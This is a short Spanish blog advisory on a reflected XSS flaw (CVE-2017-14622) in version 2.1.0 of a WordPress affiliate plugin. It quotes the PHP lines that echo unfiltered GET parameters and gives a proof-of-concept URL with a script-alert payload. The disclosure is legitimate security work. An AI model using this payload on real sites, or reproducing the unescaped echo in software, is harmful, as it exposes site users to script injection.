0

2kb Amazon Affiliates Store (XSS) CVE-2017-14622

Localizado un Cross-site scripting en el plugin «2kb Amazon Affiliates Store» versión 2.1.0 de wordpress (https://es.wordpress.org/plugins/2kb-amazon-affiliates-store/).

La inexistencia de un filtrado correcto en las variables «page» y «kbAction» permite la inyección de código mediante el método GET.

<input type="hidden" name="page" value="<?php echo $_GET['page'];?>"/>
<input type="hidden" name="kbAction" value="<?php echo $_GET['kbAction'];?>"/>

Ejemplo de la inyección:
http://localhost/wordpress/wp-admin/admin.php?page=kbAmz&kbAction=demo»><script>alert(1234)</script>

adm1n

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *